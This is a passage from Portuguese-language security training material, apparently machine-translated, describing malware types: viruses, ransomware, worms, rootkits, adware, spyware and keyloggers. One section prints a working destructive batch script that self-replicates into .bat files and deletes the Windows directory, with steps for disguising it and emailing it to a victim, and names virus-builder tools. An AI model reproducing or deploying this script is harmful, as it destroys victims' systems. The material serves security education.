original permanece intacto, é usada para evitar o reconhecimento de padrões pelo software antivírus. Os vírus
metamórficos são mais eficazes do que os vírus polimórficos.
11. Vírus sobrescrevendo arquivos ou cavidades: Alguns programas têm espaços vazios. Os vírus de cavidade, também
conhecidos como preenchedores de espaço, sobrescrevem uma parte do arquivo host com uma constante (geralmente
nula), sem aumentar o tamanho do arquivo, preservando sua funcionalidade.
Manter um tamanho de arquivo constante durante a infecção permite que o vírus evite a detecção.
Os vírus de cavidade raramente são encontrados devido à indisponibilidade de hosts e à complexidade do código.

12. Vírus associado/vírus de camuflagem: O vírus associado se armazena com o mesmo nome de
arquivo do arquivo de programa de destino. O vírus infecta o computador ao executar o arquivo e
modifica os dados do disco rígido. Vírus associados usam DOS para executar arquivos COM antes
da execução de arquivos EXE. O vírus instala um arquivo COM idêntico e infecta arquivos EXE.
13. Vírus Shell: O código do vírus shell forma um shell ao redor do código do programa host de destino,
tornando-se o programa original com o código host como sua sub-rotina. Quase todos os vírus de
programa de inicialização são vírus shell.
14. Vírus de extensão de arquivo: Os vírus de extensão de arquivo alteram as extensões dos arquivos. A
extensão .TXT é segura, pois indica um arquivo de texto puro. Com as extensões desativadas, se
alguém lhe enviar um arquivo chamado BAD.TXT.VBS, você verá apenas BAD.TXT. Se você
esqueceu que as extensões estão desativadas, pode pensar que este é um arquivo de texto e abri-lo.
Na verdade, é um arquivo de vírus Visual Basic Script executável e pode causar danos graves.
15. Vírus FAT: Um vírus FAT é um vírus de computador que ataca a Tabela de Alocação de Arquivos
(FAT), um sistema usado em produtos da Microsoft e alguns outros tipos de sistemas de computador
para acessar as informações armazenadas em um computador. Ao atacar o FAT, um vírus pode
causar danos graves a um computador. Os vírus FAT podem funcionar de várias maneiras. Alguns
são projetados para se incorporarem a arquivos de modo que, quando o FAT acessar o arquivo, o
vírus seja acionado. Outros podem atacar o FAT diretamente.
16. Vírus Logic Bomb: Uma bomba lógica é um vírus que é acionado por uma resposta a um evento,
como o lançamento de um aplicativo ou quando uma data/hora específica é atingida, onde envolve a
lógica para executar o acionador. Quando uma bomba lógica é programada para ser executada em
uma data específica, ela é chamada de bomba-relógio. As bombas-relógio geralmente são
programadas para explodir quando datas importantes são alcançadas, como Natal e Dia dos Namorados.
17. Vírus de script da Web: Um vírus de script da Web é um tipo de vulnerabilidade de segurança do
computador que viola a segurança do navegador da Web por meio de um site. Isso permite que os
invasores injetem scripts do lado do cliente na página da web. Ele pode ignorar os controles de
acesso e roubar informações do navegador da web. Os vírus de script da Web geralmente são usados
para atacar sites com grandes populações, como sites de redes sociais, comentários de usuários e e-mail.
18. Vírus de e-mail : Um vírus de e-mail refere-se a um código de computador enviado a você como um
anexo de e-mail que, se ativado, resultará em alguns efeitos inesperados e geralmente prejudiciais,
como destruir arquivos específicos em seu disco rígido e causar o anexo seja enviado por e-mail para
todos em seu catálogo de endereços. Os vírus de e-mail executam uma ampla variedade de
atividades, desde a criação de pop-ups até a falha de sistemas ou o roubo de dados pessoais.
19. Vírus blindados: Os vírus blindados são projetados para confundir ou enganar os sistemas antivírus
implantados para impedir que eles detectem a fonte real da infecção. Esses vírus tornam difícil para
os programas antivírus rastrear a fonte real do ataque. Eles enganam os programas antivírus
mostrando algum outro local, mesmo que estejam no próprio sistema.

20. Vírus Add-on: Os vírus add-on anexam seu código ao código do host sem fazer nenhuma alteração no último
ou realocam o código do host para inserir seu código no início.
21. Vírus Intrusivo: Os vírus intrusivos sobrescrevem o código do host total ou parcialmente com o
código viral.
22. Ação Direta ou Vírus Transitório: Ação direta ou vírus transitório transferem todos os controles do código do
host para onde ele reside na memória. Ele seleciona o programa de destino a ser modificado e o corrompe. A
vida de um vírus transitório é diretamente proporcional à vida de seu hospedeiro. Portanto, o vírus transitório
é executado apenas após a execução de seu programa anexado e termina após o término de seu programa
anexado. No momento da execução, o vírus pode se espalhar para outros programas. Este vírus é transitório
ou direto, pois opera apenas por um curto período e vai diretamente para o disco para procurar programas
para infectar.
23. Terminate and Stay Resident Virus (TSR): Um vírus Terminate and Stay Resident (TSR) permanece
permanentemente na memória da máquina de destino durante toda uma sessão de trabalho, mesmo após o
programa do host de destino ser executado e encerrado. O vírus TSR permanece na memória e, portanto, tem
algum controle sobre os processos.

Criando um Vírus
Um vírus pode ser criado de duas maneiras diferentes:
ÿ Escrevendo um programa de vírus
ÿ Usando as Ferramentas do Criador de Vírus

Envie o arquivo Game.com
como um anexo de e-mail para um
vítima
Crie um arquivo de lote

Game.bat com este texto
@ echo off for

%%f in (*.bat) do copy %%f +
Escrevendo um Vírus Game.bat del c:\Windows\*.*
Programa
Quando executado, ele se copia

Converta o arquivo de lote
para todos os arquivos .bat no atual
Game.bat para Game.com
diretório e exclui todos os arquivos
usando o utilitário bat2com
no diretório do Windows
Criando um vírus (continuação)

Criador de Vírus JPS
Ferramentas do Criador de Vírus
ÿ Criador de vírus em lote do DELmE
ÿ Criador de Vírus Bhavesh SKW
Usando Vírus ÿ Criador de vírus mortal

ferramentas do fabricante
ÿ SonicBat Batch Virus Maker
ÿ Criador de Vírus TeraBIT
ÿ Vírus em lote de Andreinick05

criador
Criando um Vírus
Um vírus pode ser criado de duas maneiras: escrevendo um programa de vírus e usando ferramentas de criação de vírus.

ÿ Escrevendo um Programa de Vírus Simples
As etapas a seguir estão envolvidas na criação de um programa de vírus simples:
1. Crie um arquivo em lote Game.bat com o seguinte texto:
@ eco desligado
para %%f in (*.bat) copie %%f + Game.bat
del c:\Windows\*.*
2. Converta o arquivo de lote Game.bat em Game.com usando o utilitário bat2com
3. Envie o arquivo Game.com como um anexo de e-mail para a vítima
4. Quando o Game.com é executado pela vítima, ele se copia para todos os arquivos .bat no diretório atual da
máquina de destino e exclui todos os arquivos no diretório do Windows
ÿ Usando as Ferramentas do Criador de Vírus
As ferramentas do criador de vírus permitem que você personalize e crie seu vírus em um único arquivo
executável. A natureza do vírus depende das opções disponíveis na ferramenta do criador de vírus.
Depois que o arquivo de vírus é criado e executado, ele pode executar as seguintes tarefas:
o Desative o prompt de comando do Windows e o Gerenciador de Tarefas do Windows
o Desligue o sistema
o Infectar todos os arquivos executáveis
o Injetar-se no registro do Windows e inicializar com o Windows
o Executar atividades não maliciosas, como ações incomuns de mouse e teclado
As seguintes ferramentas são úteis para testar a segurança do seu próprio software antivírus.
o Criador de vírus em lote do DELmE
O Batch Virus Generator do DELmE é um programa de criação de vírus com muitas opções para infectar o
PC da vítima, como formatar a unidade C:, excluir todos os arquivos da unidade de disco rígido, desabilitar
privilégios de administrador, limpar o registro, alterar a página inicial, matar tarefas e desabilitar/remover o
antivírus e o firewall.

Figura 3.4: Captura de tela do Batch Virus Maker do DELmE
o Criador de Vírus JPS
A ferramenta JPS Virus Maker é usada para criar vírus personalizados. Tem muitas opções embutidas
para criar um vírus. Alguns dos recursos desta ferramenta são inicialização automática, desativar o
gerenciador de tarefas, desativar o painel de controle, ativar a área de trabalho remota, desativar o
Windows Defender, etc.

Figura 3.5: Funcionamento do JPS Virus Maker
Algumas ferramentas adicionais do criador de vírus são as seguintes:
ÿ Criador de Vírus Bhavesh SKW
ÿ Criador de vírus mortal
ÿ SonicBat Batch Virus Maker
ÿ Criador de Vírus TeraBIT
ÿ Criador de vírus em lote de Andreinick05

ÿ Um tipo de malware que restringe o acesso ao sistema do computador

arquivos e pastas
ransomware ÿ Exige um pagamento de resgate online ao(s) criador(es) do malware para
remover as restrições
Os arquivos são
criptografados e o
acesso é bloqueado exigindo resgate
Anexa
ransomware
Atacante O malware é Atacante desbloqueia e
em e-mail Vítima paga resgate A vítima obtém acesso
executado e instalado para ter acesso fornece acesso
aos arquivos
Ransomware (continuação)
ransomware
Dharma
Famílias
Dharma é um • Cerber
ransomware
• CTB-armário
terrível que ataca as
vítimas por meio de • Sodinokibi
campanhas de e-mail;
• BitPaymer
as notas de resgate
pedem às vítimas que • CriptografiaXXX
entrem em contato com

• Cryptorbit
os agentes da ameaça ransomware
por meio de um endereço
• Cripto Locker
de e-mail fornecido e
ransomware
paguem em bitcoins
pelo serviço de • Criptografia
descriptografia Defesa
Dharma – Notas de resgate ransomware
• Parede de Criptomoedas
ransomware
ransomware
Ransomware é um tipo de malware que restringe o acesso ao sistema de computador infectado ou a
arquivos e documentos críticos armazenados nele e, em seguida, exige um pagamento de resgate online
ao(s) criador(es) do malware para remover as restrições do usuário. Ransomware é um tipo de criptomalware
que pode criptografar arquivos armazenados no disco rígido do sistema ou simplesmente bloquear o sistema
e exibir mensagens destinadas a induzir o usuário a pagar o resgate.

Normalmente, o ransomware se espalha como um Trojan, entrando no sistema por meio de anexos de e-mail, sites
invadidos, programas infectados, downloads de aplicativos de sites não confiáveis, vulnerabilidades em serviços de
rede e assim por diante. Após a execução, a carga útil do ransomware é executada e criptografa os dados da vítima
(arquivos e documentos), que podem ser descriptografados apenas pelo autor do malware. Em alguns casos, a
interação do usuário é restrita usando uma carga útil simples.
Em um navegador da web, um arquivo de texto ou página da web exibe as demandas do ransomware. As mensagens
exibidas parecem ser de empresas ou agentes da lei alegando falsamente que o sistema da vítima está sendo usado
para fins ilegais ou contém conteúdo ilegal (por exemplo, vídeos pornográficos, software pirata) ou pode ser um aviso
de ativação de produto da Microsoft alegando falsamente que O software Office instalado é falso e requer a reativação
do produto. Essas mensagens induzem as vítimas a pagar para desfazer as restrições impostas a elas. O Ransomware
aproveita o medo, a confiança, a surpresa e o constrangimento das vítimas para fazê-las pagar o resgate exigido.
Figura 3.6: Representação do ataque de ransomware
Famílias de ransomware
Listadas abaixo estão algumas das famílias de ransomware:
ÿ Cerber ÿ CryptorBit
ÿ CTB-Locker ÿ CriptoLocker
ÿ Sodinokibi ÿ CriptoDefesa
ÿ BitPaymer ÿ CriptoWall
ÿ CriptografiaXXX ÿ Ransomware com tema policial
Exemplos de ransomware
ÿ Dharma
Dharma é um ransomware terrível que foi identificado pela primeira vez em 2016; desde então, vem afetando
vários alvos em todo o mundo com novas versões. Tem sido atualizado regularmente com mecanismos
sofisticados nos últimos anos. No final de março de 2019, o Dharma atingiu um sistema de estacionamento
no Canadá. Anteriormente, também infectou um hospital do Texas e algumas outras organizações. As
variantes deste ransomware têm a seguinte extensão: .adobe, .bip, .combo, .cezar, .ETH, .java. Seus arquivos
criptografados têm novas extensões, como .xxxxx e .like. Este ransomware emprega um algoritmo de
criptografia AES para criptografar dados e exibe notas de resgate. Essas notas de resgate são

nomeado como Info.hta ou FILES ENCRYPTED.txt. Este ransomware realiza por meio de campanhas de
e-mail. As notas de resgate pedem às vítimas que entrem em contato com os atores da ameaça por meio
do endereço de e-mail fornecido e paguem em bitcoins pelo serviço de descriptografia.
Figura 3.7: Captura de tela exibindo a mensagem de pedido de resgate do ransomware Dharma
Alguns ransomwares adicionais são os seguintes:
ÿ eCh0raix ÿ MegaCórtex
ÿ SamSam ÿ LockerGoga
ÿ WannaCry ÿ NamPoHyu
ÿ Petya - Não Petya ÿ Ryuk
ÿ GandCrab ÿ Cryptgh0st

Worms de computador
ÿ Programas maliciosos que replicam, executam e se espalham independentemente
através das conexões de rede
ÿ Consumir recursos computacionais disponíveis sem interação humana
ÿ Os invasores usam cargas de worm para instalar backdoors em

computadores
Rede
Downloads maliciosos
Atacante se propaga programa
Minhoca
Infecta outros sistemas de vítimas
Worms de computador
Os worms de computador são programas maliciosos autônomos que replicam, executam e se espalham por conexões de
rede de forma independente, sem intervenção humana. Os invasores projetam a maioria dos worms para replicar e se
espalhar por uma rede, consumindo assim os recursos de computação disponíveis e, por sua vez, fazendo com que os
servidores de rede, servidores da Web e sistemas de computadores individuais fiquem sobrecarregados e parem de responder.
No entanto, alguns worms também carregam uma carga útil para danificar o sistema host.
Worms são um subtipo de vírus. Um worm não requer um host para replicar; no entanto, em alguns casos, a máquina
hospedeira do worm também é infectada. Inicialmente, os profissionais black hat tratavam os worms como um problema de
mainframe. Mais tarde, com a introdução da Internet, eles se concentraram principalmente no sistema operacional Windows
usando os mesmos worms, compartilhando-os via e-mail, IRC e outras funções de rede.
Os invasores usam cargas de worms para instalar backdoors em computadores infectados, o que os transforma em zumbis e
cria uma botnet. Os invasores usam esses botnets para iniciar ataques cibernéticos. Alguns dos worms de computador mais
recentes são os seguintes:
ÿ Monero
ÿ Bondade
ÿ Beapy

Figura 3.8: Representação da propagação do worm

Como um worm é diferente de um vírus?
Um worm se replica sozinho
• Um worm é um tipo especial de malware que pode se replicar e usar memória

mas não pode se anexar a outros programas
Um worm se espalha pela rede infectada
• Um worm aproveita os recursos de

transporte de arquivos ou
informações em sistemas de
computador e se espalha automaticamente
pela rede infectada, mas um vírus não
Como um worm é diferente de um vírus?
Vírus Minhoca
Um vírus infecta um sistema inserindo-se em um arquivo Um worm infecta um sistema explorando uma vulnerabilidade em um
ou programa executável sistema operacional ou aplicativo ao se replicar
Pode excluir ou alterar o conteúdo dos arquivos ou alterar a Normalmente, um worm não modifica nenhum programa
localização dos arquivos no sistema armazenado; ele apenas explora a CPU e a memória
Ele altera a maneira como um sistema de Consome largura de banda da rede, memória do sistema, etc.,
computador opera sem o conhecimento ou consentimento sobrecarregando excessivamente servidores e sistemas de computador
de um usuário
Um vírus não pode se espalhar para outros computadores, Um worm pode se replicar e se espalhar usando o IRC,
a menos que um arquivo infectado seja replicado e enviado Outlook ou outros programas de correio aplicáveis após a instalação
para os outros computadores em um sistema
Um vírus se espalha a uma taxa uniforme,

Um worm se espalha mais rapidamente do que um vírus
conforme programado
Os vírus são difíceis de remover dos infectados Comparado com um vírus, um worm pode ser facilmente removido
máquinas de um sistema
Tabela 3.2: Diferença entre vírus e worm

fabricantes de vermes
Verme da Internet
Coisa do Criador
Verme da Internet
Maker Thing é uma

ferramenta de código
aberto usada para criar
vermes que podem
infectar as
unidades, arquivos da
vítima, mostrar
mensagens e desabilitar
o software antivírus
ÿ Gerador de Vermes em Lote
ÿ Gerador de Vermes C++
Os criadores de worms são ferramentas usadas para criar e personalizar worms de computador para
executar tarefas maliciosas. Esses worms, uma vez criados, se espalham independentemente pelas redes
e envenenam redes inteiras. Com a ajuda de opções pré-definidas nos fabricantes de worms, um worm
pode ser projetado de acordo com a tarefa que se pretende executar.
ÿ Internet Worm Maker Thing
O Internet Worm Maker Thing é uma ferramenta de código aberto usada para criar worms que
podem infectar as unidades e arquivos da vítima, mostrar mensagens, desabilitar o software
antivírus etc. software antivírus ou para qualquer outra finalidade.

Figura 3.9: Captura de tela do Internet Worm Maker Thing
Alguns criadores de worms adicionais são os seguintes:
ÿ Gerador de Vermes em Lote
ÿ Gerador de Vermes C++

rootkits
Rootkits são programas que ocultam sua presença , bem

como as atividades maliciosas do invasor, concedendo-lhes
acesso total ao servidor ou host naquele momento e no futuro
Os rootkits substituem certas chamadas e utilitários

do sistema operacional por suas próprias versões
modificadas dessas rotinas que, por sua vez,
prejudicam a segurança do sistema de destino,
causando a execução de funções maliciosas
Um rootkit típico é composto por programas backdoor,

programas DDoS, farejadores de pacotes, utilitários de limpeza
de log, bots de IRC, etc.
Rootkits (continuação)
O invasor coloca um rootkit por: Objetivos de um rootkit:
Verificação de computadores e servidores Para fazer root no sistema host e obter

vulneráveis na web acesso backdoor remoto
Embrulhando -o em um pacote especial como um Para mascarar rastros de invasores e presença

jogos de aplicativos ou processos maliciosos
Instalando-o em computadores públicos ou Para coletar dados confidenciais, tráfego

corporativos por meio de engenharia social de rede etc. do sistema ao qual os invasores
podem estar restritos ou possuir
sem acesso
Lançar um ataque de dia zero (escalonamento

de privilégios, estouro de buffer, exploração do Para armazenar outros programas maliciosos
kernel do Windows, etc.) no sistema e atuar como um recurso de servidor
para atualizações de bot
rootkits
Rootkits são programas de software projetados para obter acesso a um computador sem serem detectados.
Eles são malwares que ajudam os invasores a obter acesso não autorizado a um sistema remoto e a realizar
atividades maliciosas. O objetivo de um rootkit é obter privilégios de root em um sistema. Ao fazer login
como usuário root de um sistema, um invasor pode executar várias tarefas, como instalar software ou excluir
arquivos. Ele funciona explorando as vulnerabilidades no sistema operacional e seus

formulários. Ele cria um processo de login backdoor no sistema operacional por meio do qual o invasor pode escapar
do processo de login padrão.
Depois que o usuário permite o acesso root, um rootkit pode tentar ocultar os rastros de acesso não autorizado
modificando drivers ou módulos do kernel e descartando processos ativos. Os rootkits substituem certas chamadas e
utilitários do sistema operacional por suas próprias versões modificadas dessas rotinas que, por sua vez, prejudicam
a segurança do sistema de destino ao executar funções maliciosas. Um rootkit típico inclui programas backdoor,
programas DDoS, farejadores de pacotes, utilitários de limpeza de log, bots de IRC e outros.
Os rootkits são usados para ocultar vírus, worms, bots, etc. e são difíceis de remover. O malware oculto por rootkits é
usado para monitorar, filtrar ou roubar informações e recursos confidenciais, alterar as definições de configuração do
computador de destino e executar outras ações potencialmente inseguras.
Os rootkits são instalados por invasores após obterem acesso administrativo, manipulando uma vulnerabilidade ou
quebrando uma senha. Depois que o invasor obtém controle sobre o sistema de destino, ele pode modificar arquivos
e software existente que detecta rootkits.
Os rootkits são ativados sempre que o sistema é reinicializado, antes que o sistema operacional conclua o
carregamento, tornando sua detecção um desafio. Os rootkits instalam arquivos ocultos, processos, contas de usuário
ocultas e assim por diante no sistema operacional do sistema para realizar atividades maliciosas. Eles interceptam
dados de terminais, teclado e conexões de rede e permitem que invasores extraiam informações confidenciais do
usuário-alvo. Os rootkits coletam informações confidenciais do usuário, como nomes de usuário, senhas, detalhes de
cartão de crédito e detalhes de contas bancárias, a fim de cometer fraudes ou atingir outros objetivos maliciosos.
O invasor coloca um rootkit por
ÿ Verificação de computadores e servidores vulneráveis na web
ÿ Envolvendo o rootkit em um pacote especial como um jogo
ÿ Instalando-o em computadores públicos ou corporativos por meio de engenharia social
ÿ Lançar um ataque de dia zero (escalonamento de privilégios, exploração do kernel do Windows, etc.)
Objetivos de um rootkit:
ÿ Para fazer root no sistema host e obter acesso backdoor remoto
ÿ Para mascarar rastros de invasores e presença de aplicativos ou processos maliciosos
ÿ Para coletar dados confidenciais, tráfego de rede, etc. do sistema para o qual os invasores podem
ser restrito ou não ter acesso
ÿ Para armazenar outros programas maliciosos no sistema e atuar como um recurso de servidor para bot
atualizações

Aplicativo ou aplicativos potencialmente indesejados (PUAs)

Também conhecidos como grayware ou junkware, são aplicativos potencialmente nocivos que podem representar sérios
riscos à segurança e privacidade dos dados armazenados no sistema onde são instalados
Instalado ao baixar e instalar freeware usando um instalador de terceiros ou ao aceitar um contrato de licença
enganoso
Monitore e altere secretamente os dados ou configurações no sistema, de forma semelhante a outros malwares
Tipos de APIs
Marketing
Aplicativo ou aplicativos potencialmente indesejados (PUAs)

Aplicativos ou programas potencialmente indesejados (PUAs ou PUPs, respectivamente), também conhecidos
como grayware/junkware, são aplicativos potencialmente nocivos que podem representar sérios riscos à
segurança e privacidade dos dados armazenados no sistema onde estão instalados. A maioria dos PUAs se
origina de fontes como pacotes de software legítimos e até aplicativos maliciosos usados para atividades ilegais.
Os PUAs podem degradar o desempenho do sistema e comprometer a privacidade e a segurança dos dados.
A maioria dos PUAs é instalada ao baixar e instalar freeware usando um instalador de terceiros ou ao aceitar
um contrato de licença enganoso. Os PUAs podem monitorar e alterar secretamente os dados ou configurações
no sistema, da mesma forma que outros malwares.
Tipos de APIs
ÿ Adware: Esses PUAs exibem anúncios não solicitados oferecendo vendas gratuitas e pop-ups de serviços
online ao navegar em sites. Eles podem atrapalhar as atividades normais e induzir as vítimas a clicar
em URLs maliciosos. Eles também podem emitir lembretes falsos sobre software ou sistema operacional
desatualizado.
ÿ Torrent: Ao usar aplicativos de torrent para baixar arquivos grandes, o usuário pode ser obrigado a baixar
programas indesejados que possuem recursos de compartilhamento de arquivos ponto a ponto.
ÿ Marketing: PUAs de marketing monitoram as atividades online realizadas pelos usuários e enviam
detalhes do navegador e informações sobre interesses pessoais para proprietários de aplicativos de terceiros.
Esses aplicativos então comercializam produtos e recursos com base nos interesses pessoais dos
usuários.
ÿ Criptomineração: PUAs de criptomineração fazem uso dos ativos pessoais e dados financeiros das
vítimas no sistema e realizam a mineração digital de criptomoedas como bitcoins.

ÿ Discadores: Discadores ou discadores spyware são programas que são instalados e configurados em
um sistema automaticamente para ligar para um conjunto de contatos em vários locais sem o
consentimento do usuário. Os discadores causam contas telefônicas enormes e às vezes são muito
difíceis de localizar e excluir.

Adware
ÿ Um software ou programa que oferece suporte a anúncios e

gera anúncios não solicitados e pop-ups
ÿ Rastreia os cookies e os padrões de navegação do usuário para marketing

propósitos e coleta dados do usuário
ÿ Consome largura de banda adicional e esgota os recursos e a

memória da CPU
Indicações de Adware
• Atraso frequente do sistema
• Anúncios inundados
• Travamento incessante do sistema
• Disparidade na página inicial do navegador padrão

• Presença de uma nova barra de ferramentas ou complementos do navegador
• Internet lenta
Adware
Adware refere-se a software ou programa que oferece suporte a anúncios e gera anúncios e pop-ups não solicitados. Ele
rastreia cookies e padrões de navegação do usuário para fins de marketing e exibição de anúncios. Ele coleta dados do
usuário, como sites visitados, para personalizar anúncios para o usuário. O software legítimo pode ser incorporado ao adware
para gerar receita, caso em que o adware é considerado uma alternativa legítima fornecida aos clientes que não desejam
pagar pelo software. Em alguns casos, o software legítimo pode ser incorporado com adware por um invasor ou por terceiros
para gerar receita.
O software que contém adware legítimo geralmente oferece a opção de desativar os anúncios comprando uma chave de
registro. Os desenvolvedores de software utilizam adware como um meio de reduzir os custos de desenvolvimento e aumentar
os lucros. O adware permite que eles ofereçam software gratuitamente ou a preços reduzidos, motivando-os a projetar, manter
e atualizar seus produtos de software.
O adware geralmente requer uma conexão com a Internet para ser executado. Os programas comuns de adware incluem
barras de ferramentas na área de trabalho do usuário ou aquelas que funcionam em conjunto com o navegador da web do usuário.
O adware pode realizar pesquisas avançadas na web ou no disco rígido do usuário e pode fornecer recursos para melhorar a
organização de favoritos e atalhos. O adware avançado também pode incluir jogos e utilitários de uso gratuito, mas que exibem
anúncios enquanto os programas são iniciados. Por exemplo, pode ser necessário que os usuários esperem até que um
anúncio seja concluído antes de assistir a um vídeo do YouTube.
Embora o adware possa ser benéfico ao oferecer uma alternativa ao software pago, os invasores podem fazer uso indevido
do adware para explorar os usuários. Quando o adware legítimo é desinstalado, os anúncios devem parar.
Além disso, o adware legítimo solicita permissão do usuário antes de coletar os dados do usuário. No entanto, quando os
dados do usuário são coletados sem a permissão do usuário, o adware é malicioso. Esse adware é denominado spyware e
pode afetar a privacidade e a segurança do usuário. Adware malicioso é

instalado em um computador por meio de cookies, plug-ins, compartilhamento de arquivos, freeware e shareware. Ele consome
largura de banda adicional e esgota os recursos e a memória da CPU. Os invasores executam ataques de spyware e coletam
informações do disco rígido do usuário-alvo sobre sites visitados ou pressionamentos de tecla para usar indevidamente as
informações e realizar fraudes.
Indicações de Adware
ÿ Atraso frequente do sistema: Se o sistema demorar mais do que o normal para responder, pode haver infecção por adware.
Adware também afeta a velocidade do processador e consome memória, degradando o desempenho.
ÿ Anúncios inundados: O usuário é inundado com anúncios não solicitados e pop-ups na interface do usuário durante a
navegação. Ocasionalmente, os anúncios podem ser muito difíceis de fechar, abrindo caminho para redirecionamentos
maliciosos.
ÿ Travamento incessante do sistema: O sistema do usuário pode travar ou congelar constantemente, exibindo
ocasionalmente a tela azul da morte (BSoD).
ÿ Disparidade na página inicial do navegador padrão: A página inicial do navegador padrão muda
inesperadamente e redireciona para páginas maliciosas que contêm malware.
ÿ Presença de nova barra de ferramentas ou complementos do navegador: A instalação de uma nova barra de ferramentas ou
complemento do navegador sem o consentimento do usuário é uma indicação de adware.
ÿ Internet lenta: o adware pode fazer com que a conexão com a Internet diminua, mesmo em uso normal, baixando anúncios
enormes e itens indesejados em segundo plano.

Spyware
Um programa furtivo
que registra a interação do
usuário com o computador e o Atacante controlado
Internet sem o conhecimento Servidor web
do usuário e envia as
informações para os atacantes remotos Monitora e registra secretamente as
atividades do usuário
Oculta seu processo, arquivos e

Rouba informações pessoais dos usuários e envia para
outros objetos para evitar detecção o invasor
e remoção Atacante
Vítima
Spyware (continuação)
Propagação de Spyware O que o spyware faz?
1 Download drive-by Rouba informações pessoais dos usuários e as

1 envia para um servidor remoto ou sequestrador
2 Disfarçado de anti-spyware
2 Monitora a atividade online dos usuários
3 Explorações de vulnerabilidade do navegador da Web

3 Exibe pop-ups irritantes
4 Instalação de software de carona

4 Redireciona um navegador da Web para sites de publicidade
5 Complementos do navegador
5 Altera as configurações padrão do navegador
6 Biscoitos
6 Altera as configurações do firewall
Spyware
Spyware é um software furtivo de monitoramento de computador que permite gravar secretamente todas as
atividades do usuário em um computador de destino. Ele entrega logs automaticamente ao atacante remoto
usando a Internet (via e-mail, FTP, comando e controle por meio de tráfego criptografado, HTTP, DNS, etc.).
Os logs de entrega incluem informações sobre todas as áreas do sistema, como e-mails enviados, sites
visitados, cada tecla digitada (incluindo logins/senhas para Gmail, Facebook, Twitter,

LinkedIn, etc.), operações de arquivo e conversas de bate-papo online. Ele também faz capturas de tela
em intervalos definidos, assim como uma câmera de vigilância apontada para o monitor do computador. O
spyware é semelhante a um cavalo de Tróia, que geralmente é agrupado como um componente oculto de
freeware ou software baixado da Internet. Ele oculta seu processo, arquivos e outros objetos para evitar
detecção e remoção.
O spyware infecta o sistema do usuário quando ele visita um site fraudulento contendo código malicioso
controlado pelo autor do spyware. Esse código malicioso baixa e instala à força spyware no computador do
usuário. Ele também pode infectar o computador, por exemplo, manipulando brechas no navegador/
software ou vinculando-se a software confiável. Uma vez instalado, o spyware monitora as atividades do
usuário na Internet. Isso permite que um invasor colete informações sobre uma vítima ou organização,
como endereços de e-mail, logins de usuários, senhas, números de cartão de crédito e credenciais
bancárias.
Figura 3.10: Demonstração de spyware
ÿ Propagação de Spyware
Como o próprio nome indica, o spyware é instalado sem o conhecimento ou consentimento do

usuário, e isso pode ser feito "pegando carona" do spyware em outros aplicativos. Isso é possível
porque o spyware usa cookies de publicidade, que é uma das subclasses de spyware. O spyware
também pode afetar seu sistema quando você visita um site de distribuição de spyware. Como ele
se instala automaticamente quando você visita e clica em algo em um site, esse processo é
conhecido como “download direto”.
Como resultado de atividades normais de navegação na web ou download, o sistema pode ser
inadvertidamente infectado por spyware. Ele pode até mesmo se disfarçar como anti-spyware e
ser executado no computador do usuário sem aviso prévio, sempre que o usuário baixar e instalar
programas que acompanham o spyware.
ÿ O que o spyware faz?
Já discutimos o spyware e sua função principal de observar as atividades do usuário em um

computador de destino. Também sabemos que quando um invasor consegue instalar spyware no
computador da vítima usando as técnicas de propagação discutidas anteriormente, ele pode
executar várias ações ofensivas no computador da vítima. Portanto, vamos agora aprender

mais sobre os recursos do spyware, pois agora estamos cientes de sua capacidade de monitorar as atividades do
usuário.
O spyware instalado também pode ajudar o invasor a realizar o seguinte nos computadores de destino:
o Rouba informações pessoais dos usuários e as envia para um servidor remoto ou sequestrador
o Monitora a atividade online dos usuários
o Exibe pop-ups irritantes
o Redireciona um navegador da Web para sites de publicidade
o Altera a configuração padrão do navegador e impede que o usuário a restaure
o Adiciona vários marcadores à lista de favoritos do navegador
o Diminui o nível geral de segurança do sistema
o Reduz o desempenho do sistema e causa instabilidade do software
o Conecta-se a sites de pornografia remotos
o Coloca atalhos na área de trabalho para sites de spyware malicioso
o Rouba suas senhas
o Envia e-mail direcionado
o Altera a página inicial e impede que o usuário a restaure
o Modifica as bibliotecas vinculadas dinamicamente (DLLs) e torna o navegador mais lento
o Altera as configurações do firewall
o Monitora e relata sites que você visita

Keylogger
ÿ Registradores de pressionamento de tecla são programas ou dispositivos de hardware que monitoram cada pressionamento de tecla enquanto
o usuário digita em um teclado, faz logon em um arquivo ou os transmite para um local remoto
ÿ Permite que o invasor colete informações confidenciais sobre a vítima, como ID de e-mail, senhas,
detalhes bancários, atividade na sala de bate-papo, IRC e mensagens instantâneas
Keylogger
Senha:
***** Senha:
ADMINISTRADOR
Vítima Atacante
Keylogger
Keyloggers são programas de software ou dispositivos de hardware que registram as teclas pressionadas no teclado do
computador (também chamado de registro de pressionamento de tecla) de um usuário de computador individual ou de
uma rede de computadores. Você pode visualizar todas as teclas digitadas no computador da vítima a qualquer momento
em seu sistema, instalando este dispositivo ou programa de hardware. Ele registra quase todas as teclas digitadas no
teclado de um usuário e salva as informações gravadas em um arquivo de texto. Como os keyloggers ocultam seus
processos e interface, o alvo não tem conhecimento do keylogging. Escritórios e indústrias usam keyloggers para
monitorar as atividades do computador dos funcionários e também podem ser usados em ambientes domésticos para os
pais monitorarem as atividades dos filhos na Internet.
Um keylogger, quando associado a spyware, ajuda a transmitir as informações de um usuário a terceiros desconhecidos.
Os invasores o usam ilegalmente para fins maliciosos, como roubar informações confidenciais e confidenciais sobre as
vítimas. Essas informações confidenciais incluem IDs de e-mail, senhas, detalhes bancários, atividades em salas de bate-
papo, bate-papo de retransmissão na Internet (IRC), mensagens instantâneas e números bancários e de cartão de crédito.
Os dados transmitidos pela conexão de Internet criptografada também são vulneráveis ao keylogger porque o keylogger
rastreia as teclas digitadas antes da criptografia.
O programa keylogger é instalado no sistema do usuário de forma invisível por meio de anexos de e-mail ou downloads
“drive-by” quando os usuários visitam determinados sites. Os registradores físicos de pressionamento de tecla “ficam”
entre o hardware do teclado e o sistema operacional, para que possam permanecer indetectáveis e registrar cada
pressionamento de tecla.

Figura 3.11: Ilustração do keylogger

O que um Keylogger pode fazer?

Registre cada tecla digitada no teclado do usuário
Capture capturas de tela em intervalos regulares, mostrando a

atividade do usuário, como caracteres digitados
Rastreie as atividades dos usuários registrando títulos de janelas,

nomes de aplicativos iniciados, etc.
Monitore a atividade online dos usuários

registrando os endereços dos sites visitados
Registre todos os nomes de login, números bancários e de cartão

de crédito e senhas
Grave conversas de bate-papo online
O que um Keylogger pode fazer?
Um keylogger pode:
ÿ Registre cada tecla digitada no teclado do usuário
